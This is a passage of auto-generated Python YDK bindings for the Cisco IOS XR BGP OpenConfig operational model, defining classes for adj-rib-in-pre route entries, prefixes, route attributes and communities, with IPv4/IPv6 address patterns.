**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
    # Python 2/3 compatible superclass initialisation (generated idiom).
    if sys.version_info > (3,):
        super().__init__()
    else:
        super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route, self).__init__()
    # Schema identity: one route entry in the adj-rib-in-pre routes table.
    self.yang_name = "route"
    self.yang_parent_name = "routes"
    self.is_top_level_class = False
    self.has_list_ancestor = True
    self.ylist_key_names = []
    # Child containers: YANG name -> (python attribute, binding class).
    self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved))])
    # Leaf descriptors; 'route' and 'neighbor_address' are unions of two
    # string patterns (IPv4 and IPv6 forms), hence the ['str','str'] types.
    self._leafs = OrderedDict([
        ('route', (YLeaf(YType.str, 'route'), ['str','str'])),
        ('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
        ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
        ('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
        ('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
        ('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
    ])
    self.route = None
    self.neighbor_address = None
    self.path_id = None
    self.valid_route = None
    self.invalid_reason = None
    self.best_path = None
    # Eagerly instantiate singleton child containers and link parents.
    self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName()
    self.prefix_name.parent = self
    self._children_name_map["prefix_name"] = "prefix-name"
    self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList()
    self.route_attr_list.parent = self
    self._children_name_map["route_attr_list"] = "route-attr-list"
    self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList()
    self.ext_attributes_list.parent = self
    self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
    self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastModifiedDate()
    self.last_modified_date.parent = self
    self._children_name_map["last_modified_date"] = "last-modified-date"
    self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.LastUpdateRecieved()
    self.last_update_recieved.parent = self
    self._children_name_map["last_update_recieved"] = "last-update-recieved"
    self._segment_path = lambda: "route"
    # Freeze: further sets are validated by __setattr__.
    self._is_frozen = True
def __setattr__(self, name, value):
    """Validate attribute writes once the entity is frozen.

    Delegates to YDK's ``_perform_setattr``, which only allows the
    declared leaf names (and child containers) to be assigned.
    """
    route_class = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route
    leaf_names = ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path']
    self._perform_setattr(route_class, leaf_names, name, value)
class PrefixName(_Entity_):
    """
    Prefix
    .. attribute:: prefix
    Prefix
    **type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix>`
    **config**\: False
    .. attribute:: prefix_length
    Prefix length
    **type**\: int
    **range:** 0..255
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 3 vs legacy Python 2 super() invocation for the generated base.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, self).__init__()

        self.yang_name = "prefix-name"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # YANG child container name -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix))])
        # Leaf descriptors: python name -> (YLeaf(type, yang-name), python types).
        self._leafs = OrderedDict([
            ('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
        ])
        self.prefix_length = None
        self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix()
        self.prefix.parent = self
        self._children_name_map["prefix"] = "prefix"
        self._segment_path = lambda: "prefix-name"
        # Freeze: subsequent attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName, ['prefix_length'], name, value)

    class Prefix(_Entity_):
        """
        Prefix
        .. attribute:: afi
        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False
        .. attribute:: ipv4_address
        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: ipv6_address
        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, self).__init__()

            self.yang_name = "prefix"
            self.yang_parent_name = "prefix-name"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            # Leaf container: no child containers under "prefix".
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "prefix"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import: the _meta module is large and only needed on demand.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName.Prefix']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
    """
    RouteAttributesList
    .. attribute:: next_hop
    NextHopAddress
    **type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop>`
    **config**\: False
    .. attribute:: aggregrator_attributes
    AggregatorList
    **type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes>`
    **config**\: False
    .. attribute:: origin_type
    Origin Attribute Type
    **type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
    **config**\: False
    .. attribute:: as_path
    AS Path
    **type**\: str
    **config**\: False
    .. attribute:: as4_path
    AS4 Path
    **type**\: str
    **config**\: False
    .. attribute:: med
    Med
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: local_pref
    LocalPref
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: atomic_aggr
    AtomicAggr
    **type**\: bool
    **config**\: False
    .. attribute:: community
    CommunityArray
    **type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community>`
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 3 vs legacy Python 2 super() invocation for the generated base.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, self).__init__()

        self.yang_name = "route-attr-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # YANG child container/list name -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community))])
        # Leaf descriptors: python name -> (YLeaf(type, yang-name), python types).
        self._leafs = OrderedDict([
            ('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
            ('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
            ('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
            ('med', (YLeaf(YType.uint32, 'med'), ['int'])),
            ('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
            ('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
        ])
        self.origin_type = None
        self.as_path = None
        self.as4_path = None
        self.med = None
        self.local_pref = None
        self.atomic_aggr = None
        self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop()
        self.next_hop.parent = self
        self._children_name_map["next_hop"] = "next-hop"
        self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes()
        self.aggregrator_attributes.parent = self
        self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
        # "community" is a YANG list; YList keeps entries bound to this parent.
        self.community = YList(self)
        self._segment_path = lambda: "route-attr-list"
        # Freeze: subsequent attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)

    class NextHop(_Entity_):
        """
        NextHopAddress
        .. attribute:: afi
        AFI
        **type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
        **config**\: False
        .. attribute:: ipv4_address
        IPv4 Addr
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        .. attribute:: ipv6_address
        IPv6 Addr
        **type**\: str
        **pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, self).__init__()

            self.yang_name = "next-hop"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
                ('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
                ('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
            ])
            self.afi = None
            self.ipv4_address = None
            self.ipv6_address = None
            self._segment_path = lambda: "next-hop"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)

        @staticmethod
        def _meta_info():
            # Lazy import: the _meta module is large and only needed on demand.
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.NextHop']['meta_info']

    class AggregratorAttributes(_Entity_):
        """
        AggregatorList
        .. attribute:: as_
        AS number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: as4
        AS4 number
        **type**\: int
        **range:** 0..4294967295
        **config**\: False
        .. attribute:: address
        IPv4 address
        **type**\: str
        **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()

            self.yang_name = "aggregrator-attributes"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            # 'as' is a Python keyword, so the leaf is exposed as 'as_'.
            self._leafs = OrderedDict([
                ('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
                ('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
                ('address', (YLeaf(YType.str, 'address'), ['str'])),
            ])
            self.as_ = None
            self.as4 = None
            self.address = None
            self._segment_path = lambda: "aggregrator-attributes"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']

    class Community(_Entity_):
        """
        CommunityArray
        .. attribute:: objects
        BGP OC objects
        **type**\: str
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, self).__init__()

            self.yang_name = "community"
            self.yang_parent_name = "route-attr-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "community"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community, ['objects'], name, value)

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
            return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList.Community']['meta_info']

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
        return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
    """
    ExtAttributesList
    .. attribute:: originator_id
    OriginatorID
    **type**\: str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: aigp
    AIGP
    **type**\: int
    **range:** 0..18446744073709551615
    **config**\: False
    .. attribute:: path_id
    PathId
    **type**\: int
    **range:** 0..4294967295
    **config**\: False
    .. attribute:: cluster
    ClusterList
    **type**\: list of str
    **pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
    **config**\: False
    .. attribute:: ext_community
    ExtendedCommunityArray
    **type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity>`
    **config**\: False
    .. attribute:: unknown_attributes
    UnknownAttributes
    **type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes>`
    **config**\: False
    """

    # YANG module prefix and revision this binding was generated from.
    _prefix = 'ipv4-bgp-oc-oper'
    _revision = '2017-09-07'

    def __init__(self):
        # Python 3 vs legacy Python 2 super() invocation for the generated base.
        if sys.version_info > (3,):
            super().__init__()
        else:
            super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, self).__init__()

        self.yang_name = "ext-attributes-list"
        self.yang_parent_name = "route"
        self.is_top_level_class = False
        self.has_list_ancestor = True
        self.ylist_key_names = []
        # YANG child list name -> (python attribute name, binding class).
        self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.UnknownAttributes))])
        self._leafs = OrderedDict([
            ('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
            ('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
            ('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
            ('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
        ])
        self.originator_id = None
        self.aigp = None
        self.path_id = None
        # 'cluster' is a leaf-list, so its python value is a plain list of str.
        self.cluster = []
        self.ext_community = YList(self)
        self.unknown_attributes = YList(self)
        self._segment_path = lambda: "ext-attributes-list"
        # Freeze: subsequent attribute writes are validated by __setattr__.
        self._is_frozen = True

    def __setattr__(self, name, value):
        self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)

    class ExtCommunity(_Entity_):
        """
        ExtendedCommunityArray
        .. attribute:: objects
        BGP OC objects
        **type**\: str
        **config**\: False
        """

        _prefix = 'ipv4-bgp-oc-oper'
        _revision = '2017-09-07'

        def __init__(self):
            if sys.version_info > (3,):
                super().__init__()
            else:
                super(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()

            self.yang_name = "ext-community"
            self.yang_parent_name = "ext-attributes-list"
            self.is_top_level_class = False
            self.has_list_ancestor = True
            self.ylist_key_names = []
            self._child_classes = OrderedDict([])
            self._leafs = OrderedDict([
                ('objects', (YLeaf(YType.str, 'objects'), ['str'])),
            ])
            self.objects = None
            self._segment_path = lambda: "ext-community"
            self._is_frozen = True

        def __setattr__(self, name, value):
            self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv4Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPre.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)

        @staticmethod
